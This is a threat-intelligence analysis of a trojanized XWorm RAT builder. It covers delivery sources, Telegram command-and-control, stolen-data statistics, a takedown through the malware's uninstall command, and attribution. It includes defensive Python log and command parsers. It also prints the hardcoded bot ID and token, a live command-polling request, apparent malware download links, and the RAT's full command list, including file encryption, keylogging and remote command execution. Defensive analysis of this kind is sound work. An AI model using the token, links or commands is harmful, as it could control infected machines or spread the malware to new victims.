Executive Summary
A trojanized version of the XWorm RAT builder has been weaponized and propagated. It specifically targets script kiddies who are new to cybersecurity and directly download and use tools mentioned in various tutorials, showing that there is no honour among thieves. The malware is spread primarily through a GitHub repository but also through other file-sharing services. It has so far compromised over 18,459 devices globally and is capable of exfiltrating sensitive data such as browser credentials, Discord tokens, Telegram data, and system information. The malware also features advanced functionality, including virtualization checks, registry modifications, and a wide array of commands enabling full control over infected systems. The top victim countries include Russia, the USA, India, Ukraine, and Turkey.
The malware uses Telegram as its command-and-control (C&C) infrastructure, leveraging bot tokens and API calls to issue commands to infected devices and exfiltrate stolen data. Analysis revealed the malware has so far exfiltrated more than 1 GB of browser credentials from multiple devices. Researchers also identified the malware's "kill switch" feature, which was leveraged to disrupt operations on active devices.
Disruption efforts targeted the malware's botnet by exploiting its uninstall command. While effective for active devices, limitations such as offline machines and Telegram's rate limiting posed challenges. Attribution efforts linked the operation to a threat actor using aliases such as "@shinyenigma" and "@milleniumrat", as well as GitHub accounts and a ProtonMail address.
Analysis
The rise of sophisticated Remote Access Trojans (RATs) has amplified cyber threats, with XWorm emerging as a significant example. Recently, a trojanized XWorm RAT builder was identified that is being propagated by threat actors via multiple channels, such as GitHub repositories, file-sharing services, Telegram channels, and forums. It is specifically targeted at script kiddies who are new to cybersecurity and use tools mentioned in various tutorials. The builder gives attackers a streamlined tool to deploy and operate a highly capable RAT with advanced capabilities such as system reconnaissance, data exfiltration, and command execution.
This analysis aims to provide detailed insights into the delivery, functionality, and impact of this Trojanized XWorm RAT builder. By leveraging data exfiltrated via Telegram, we uncovered the infection sources, mapped its command-and-control (C&C) mechanisms, and identified the breadth of its capabilities and the affected devices. Additionally, we conducted disruption activities targeting the botnet infrastructure to mitigate its operations.
Delivery Vector
We used the Telegram API to forward the messages exfiltrated by the bot to an account under our control. We then ran OCR on the images in those messages, which were screen captures of the infected devices, extracted the URLs visible in them, and so identified the following sources of infection:
File-sharing Services
- https://mega.nz/file/wz1C3TYT
- https://www.upload.ee/files/16734195/AsyncClientexe.html
- https://www.upload.ee/files/17050076/binded.exe.html
GitHub Repositories
Telegram Channels
YouTube and Other Websites
- https://www.youtube.com/watch?v=wYivVXDfx9w
- https://sinister.ly/Thread-Free-cracked-RATs-and-Crypters
Features of the Malware
Virtualization Checks
The malware checks for virtualization on the system by reading registry keys. Keys associated with NdisVirtualBus and VirtualRender are more likely to exist in virtualized environments because they relate to virtual device interfaces for networking and graphics. If the malware detects that it is running in a virtual environment, it does not proceed with the infection.
Registry Modification
XWorm also modifies various registry entries. When the command “/machine_id*startupadd” is received from the C&C server, the malware adds entries to the Windows Registry to ensure that it executes at system startup. By modifying these registry keys, the malware automatically runs its payload each time the system boots, thereby maintaining continuous access.
C&C Server
The malware uses Telegram as its command-and-control server. The malware executables are hardcoded with a Telegram bot ID and bot token, which are as follows:
- Telegram Bot ID: bot8077286634
- Telegram Bot Token: AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ
Data Exfiltration
Upon first execution, the malware sends a request to “http://ip-api.com/json/” to obtain the IP address and location details of the compromised machine. It then gathers all saved passwords from the browsers and sends them via the sendDocument endpoint of the Telegram API.
The malware then also forwards any Discord tokens it has found via the sendMessage endpoint of the Telegram API.
Thereafter, the malware collects the victim's system information and forwards it to the Telegram API via sendMessage.
In some cases, the malware also takes screenshots of the system once it is infected, and it steals Telegram data if Telegram is installed on the device. Finally, it sends a “device connected” message to the Telegram chat along with the location (obtained from ip-api.com) and the machine ID of the compromised device.
Once this data has been exfiltrated, the malware lies dormant, waiting for incoming commands from the C&C server. It uses the getUpdates method of the Telegram API to listen for any incoming commands for the infected machine. A command takes the form /machine_id*command. If an attacker sends a command in this format to the Telegram bot, the infected machine picks it up and executes it accordingly.
Request
GET /bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-1 HTTP/1.1
Host: api.telegram.org
The malware waiting for commands via the Telegram API's getUpdates method
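As an added example (not code from the report), the following Python script, run over constructed proxy log lines, flags the traffic pattern described above: a geolocation lookup to ip-api.com, uploads through sendDocument/sendMessage, and repeated getUpdates polling against a single bot ID. The bot ID in the sample lines is the one reported above; the token strings and client addresses are made-up placeholders.

```python
import re
from collections import defaultdict

# Constructed proxy log lines (not from the report): "<timestamp> <client_ip> <verb> <url>".
# Bot ID 8077286634 is the one reported above; the token is a made-up placeholder.
SAMPLE_LOG = """\
2025-01-20T10:00:00Z 10.0.0.15 GET http://ip-api.com/json/
2025-01-20T10:00:02Z 10.0.0.15 POST https://api.telegram.org/bot8077286634:AAExampleNotARealToken0000000000/sendDocument
2025-01-20T10:00:03Z 10.0.0.15 POST https://api.telegram.org/bot8077286634:AAExampleNotARealToken0000000000/sendMessage
2025-01-20T10:00:05Z 10.0.0.15 GET https://api.telegram.org/bot8077286634:AAExampleNotARealToken0000000000/getUpdates?offset=-1
2025-01-20T10:00:10Z 10.0.0.15 GET https://api.telegram.org/bot8077286634:AAExampleNotARealToken0000000000/getUpdates?offset=-1
2025-01-20T10:00:15Z 10.0.0.15 GET https://api.telegram.org/bot8077286634:AAExampleNotARealToken0000000000/getUpdates?offset=-1
2025-01-20T10:01:00Z 10.0.0.22 GET https://api.telegram.org/bot111111111:AAOtherConstructedToken000000000/getMe
"""

# Bot API URL layout is /bot<numeric id>:<token>/<method>; the numeric id is a stable indicator.
BOT_API = re.compile(r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[\w-]+)/(?P<method>\w+)")
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}

def analyse(log_text, min_polls=3):
    """Group Telegram Bot API calls per client and flag the beaconing/exfiltration pattern."""
    clients = defaultdict(lambda: {"bot_ids": set(), "polls": 0, "exfil": [], "geoip": False})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        _ts, client, _verb, url = parts
        rec = clients[client]
        if "ip-api.com/json" in url:
            rec["geoip"] = True  # the malware's first request after execution
            continue
        m = BOT_API.search(url)
        if not m:
            continue
        rec["bot_ids"].add(m["bot_id"])
        if m["method"] == "getUpdates":
            rec["polls"] += 1  # one poll per command check
        elif m["method"] in EXFIL_METHODS:
            rec["exfil"].append(m["method"])
    findings = {}
    for client, rec in clients.items():
        # Repeated getUpdates polling is the C&C heartbeat; uploads right after a geolocation
        # lookup match the infection sequence described above.
        if rec["polls"] >= min_polls or (rec["geoip"] and rec["exfil"]):
            findings[client] = {"bot_ids": sorted(rec["bot_ids"]), "polls": rec["polls"],
                                "exfil": rec["exfil"], "geoip": rec["geoip"]}
    return findings
```

Because the Bot API runs over TLS, the full path is only visible where the proxy performs TLS inspection; without it, apply the same per-client frequency logic to CONNECT entries for api.telegram.org.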
Features
The exhaustive list of commands that the infected machines obey is as follows:
- /online - See all your bots
- /machine_id*help - help
- /machine_id*desktop - grab a screenshot
- /machine_id*telegram - grab telegram data
- /machine_id*discord - grab discord data
- /machine_id*whois - get user location
- /machine_id*history - grab browser history
- /machine_id*historyForce - grab more browser history by killing browser processes, use carefully
- /machine_id*browsers - grab browser data
- /machine_id*browsersForce - grab more browser data by killing browser processes, use carefully
- /machine_id*getDesktop - grab useful desktop files (.pdf, .txt etc)
- /machine_id*systeminfo - grab system information
- /machine_id*activewindow - get active window title
- /machine_id*batteryinfo - get battery status
- /machine_id*programlist - get the list of installed software
- /machine_id*uninstall - uninstall RAT from victim`s PC
- /machine_id*message*<message>*<error/warn/exclamination/question> - show messagebox to user, leave second argument empty for the default messagebox type
- /machine_id*speak*<text> - pronounce text to user, will work only if the text is in english
- /machine_id*minimize - minimize all opened windows
- /machine_id*maximize - maximize all the windows back
- /machine_id*openurl*<url> - open given url in the default user browser
- /machine_id*shutdown - turn Off the PC
- /machine_id*restart - restart the PC
- /machine_id*hibernate - enter the hibernating mode
- /machine_id*logoff - user log off
- /machine_id*bsod - invoke the Blue Screen of Death
- /machine_id*sendkeypress<keys> - the victim will "press" given keyboard keys
- /machine_id*displayrotation<0/90/180/270> - Set the angle of display rotation, 0 - normal mode
- /machine_id*encrypt*<Password> - encrypt user files with given password, must be remembered for decryption
- /machine_id*decrypt*<Password> - decrypt user files, all the files will be destroyed if the password is wrong
- /machine_id*copy*<src File/Dir full>*<dist File/Dir full path> - copy a file o directory, e.g. /3453*copy*C:\Users\User\Downloads\1.txt*C:\Users\User\1.txt
- /machine_id*list*<Dir full path> - shows files and folders in a directory, e.g. /3453*list*C:\Users
- /machine_id*size*<File/Dir full path> -get the file/directory size
- /machine_id*delete*<File/Dir full path> - deletes a file or folder
- /machine_id*run*<File full path> - runs a file (e.g. exe, png, txt etc)
- /machine_id*upload*<File/Dir full path> - Grabs a file from victim`s PC, won`t work if the file is too big
- /machine_id*download - victim`s PC downloads a file attached to this message, if it is a picture it should also be attached as a file
- /machine_id*processlist - shows the list of current processes running
- /machine_id*processkill*<process name, e.g. discord, Telegram etc> - kill a process by name, must not add .exe
- /machine_id*processpath*<process name, e.g. discord, Telegram etc> - Show the path to process, must not add .exe
- /machine_id*desktopPath - show the path to desktop
- /machine_id*startuplist - see the list of startup programs
- /machine_id*startupadd - add the RAT to startup
- /machine_id*cmd*<command> - run a cmd command on victim`s PC
- /machine_id*destroy*<Dir full path> - destroy all the possible files/folder in a directory
- /machine_id*gift*<NEW TOKEN>*<NEW CHAT ID>*<message> - gift this bot to another user, his telegram bot has to be started
- /machine_id*keylogger - get user keylogs
- /machine_id*keyloggerClear - clear user keylogs
- /machine_id*about - about
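To triage a dump of the bot chat by machine ID (the kind of data used in the Impact and Disruption sections that follow), here is an added Python example, not code from the report, that parses the command grammar listed above and buckets each command by risk. The risk buckets and the sample messages are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
# Command grammar from the list above: "/<machine_id>*<command>[*<arg>...]"; "/online" has no machine id.
COMMAND = re.compile(r"^/(?P<machine_id>\d+)\*(?P<cmd>[A-Za-z0-9]+)(?:\*(?P<args>.*))?$")

# Risk buckets are a constructed grouping of the documented commands, not the report's own.
BUCKETS = {
    "destructive": {"encrypt", "decrypt", "destroy", "delete", "bsod", "shutdown", "restart", "uninstall"},
    "exfil": {"desktop", "telegram", "discord", "whois", "history", "historyForce", "browsers",
              "browsersForce", "getDesktop", "systeminfo", "upload", "keylogger"},
    "execution": {"cmd", "run", "download", "openurl", "startupadd", "gift", "sendkeypress"},
}

def parse_command(text):
    """Return (machine_id, command, args) for a bot command, or None for any other message."""
    m = COMMAND.match(text.strip())
    if not m:
        return None
    cmd, args = m["cmd"], (m["args"].split("*") if m["args"] else [])
    # sendkeypress and displayrotation take their argument without a '*' separator.
    for glued in ("sendkeypress", "displayrotation"):
        if cmd.startswith(glued) and cmd != glued:
            cmd, args = glued, [cmd[len(glued):]] + args
    return m["machine_id"], cmd, args

def classify(cmd):
    return next((bucket for bucket, cmds in BUCKETS.items() if cmd in cmds), "other")

def triage(messages):
    """Count commands per machine id by risk bucket; returns (summary, number of non-command messages)."""
    summary = defaultdict(Counter)
    unparsed = 0
    for text in messages:
        parsed = parse_command(text)
        if parsed is None:
            unparsed += 1
            continue
        machine_id, cmd, _args = parsed
        summary[machine_id][classify(cmd)] += 1
    return {mid: dict(counts) for mid, counts in summary.items()}, unparsed

SAMPLE_MESSAGES = [  # constructed chat dump; machine ids and arguments are illustrative
    "/online",
    r"/3453*copy*C:\Users\User\Downloads\1.txt*C:\Users\User\1.txt",
    "/3453*browsers",
    "/3453*encrypt*secret",
    "/3453*uninstall",
    "/7781*cmd*whoami",
    "/7781*sendkeypressHello",
    "Device connected: 7781",  # bot status text, not a command
]
```

The per-machine summary tells an responder at a glance which hosts received destructive commands (such as encrypt or destroy) and so need file-recovery attention beyond credential resets.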
Impact
Using a certain technique, we were able to dump all of the data that the malware had exfiltrated via Telegram. Our findings show that the malware has so far compromised more than 18,459 devices. The top five countries affected by the trojanized RAT builder are as follows:
- Russia
- USA
- India
- Ukraine
- Turkey
However, of the 18,459+ infected devices, browser credentials have been stolen from only 2,068 so far. The data exfiltrated by the malware breaks down as follows:
- 4991 .jpg files: Screenshots of compromised devices, taken with the /device_id*desktop command.
- 2222 .zip files: Browser data dumped by default after infection.
- 20 .exe files: Custom executables dropped onto infected devices by the threat actors via the /device_id*download command. These executables are not present on VirusTotal as of now.
- 8 .txt files: Keylogger logs obtained by running /device_id*keylogger.
In one instance each, a .pdf and an .mp3 file were downloaded from a victim just to test whether they contained anything sensitive. The volume-wise breakdown of the exfiltrated data is as follows:
- 1112.21 MB (around 1 GB) of browser credentials exfiltrated.
- 425.784 MB of .jpg files that are screenshots of infected devices.
Disrupting the Botnet
The infected machines were working like a botnet, listening for commands via the Telegram API. During our observation we found that the malware has a feature that acts as a ‘kill switch’ of sorts, which can be triggered by Telegram messages sent to the bot by the threat actors.
The Kill Switch
The malware includes a command, /uninstall, which the threat actor had used in the past to remove the malware infection from a machine by its machine ID.
So, three things were required to remove the infection from a device:
- The machine ID assigned by the malware.
- Access to the Telegram bot to send the message.
- The infected machine being online and listening for commands.
We had collected machine IDs from the chats, and the Telegram bot's username was obtained via the getMe endpoint of the Telegram API. Combining the two, we sent two bursts of messages to the bot:
- All the machine IDs present in the messages.
- Brute forcing machine IDs from 1 to 9999.
During those bursts, any machine that was actively listening for messages and whose machine ID matched would automatically remove the malware from itself. The screenshot below shows the getUpdates response that such a machine would have seen at the time of our message bursts.
Limitations of the Approach
- Not all infected machines would be online at the time of our message bursts; those machines would not have received the uninstall command and would remain infected.
- Telegram rate-limits messages sent to the bot, so some messages may have been lost in transit, or our Telegram account may have been temporarily banned.
Attribution/Infrastructure
In the initial few messages dumped from the telegram bot, we saw that there was a .rdp file uploaded to an infected machine by the threat actors. It can be said with moderate confidence that it was being used for testing purposes by the threat actors. The AWS address in the RDP file was “ec2-18-191-85-60.us-east-2.compute.amazonaws.com”.
From the commit messages on the repositories where the threat actor shared the trojanized RAT builder, we obtained the following email address: [email protected]. In the past, the same threat actor has used multiple GitHub accounts such as:
Telegram Channel Username offering the RAT: @milleniumrat
Telegram username of the threat actor: @shinyenigma
Mitigation
1. Detection and Response
- Endpoint Detection and Response (EDR): Deploy advanced EDR solutions to detect and mitigate RAT activity by monitoring unusual system behaviors, such as unauthorized registry modifications, browser data access, or Telegram API usage.
- Network Monitoring: Utilize Intrusion Detection and Prevention Systems (IDPS) to identify and block communication to malicious C&C servers, including Telegram API endpoints.
2. Containment
- Quarantine Infected Systems: Immediately isolate compromised machines from the network to prevent further data exfiltration and lateral movement.
- Disable Malicious Telegram Bots: Report and request the suspension of Telegram bots used for C&C operations.
3. Threat Intelligence and Awareness
- Update Threat Intelligence Feeds: Continuously update intelligence feeds with IOCs (Indicators of Compromise) from the identified malicious repositories, Telegram channels, and file-sharing services.
- Employee Training: Educate employees on recognizing phishing links, malicious downloads, and fake RAT builders to minimize initial infection vectors.
4. Proactive Measures
- Block Known IOCs: Block access to malicious GitHub repositories, file-sharing links, and Telegram channels at the network perimeter.
- Monitor and Patch Systems: Regularly update software, particularly internet-facing applications, to close vulnerabilities that attackers exploit.
- Enforce Application Whitelisting: Restrict execution of unauthorized programs, such as the Trojanized RAT builder, on endpoint devices.
5. Eradication
- Use Known Kill Switch Commands: Leverage commands such as /uninstall on accessible infected devices to forcefully remove the malware, if possible.
- Comprehensive Threat Removal: After ensuring systems are offline, remove malicious registry keys, clean up startup scripts, and conduct a deep system scan to ensure the RAT is eradicated.
6. Legal and Collaborative Actions
- Engage with Law Enforcement: Collaborate with authorities to trace and prosecute the actors involved, leveraging the attribution details uncovered in the investigation.
- Collaboration with Platform Providers: Partner with platforms like GitHub, Telegram, and file-sharing services to remove malicious content and accounts.
Indicators of Compromise (IoCs)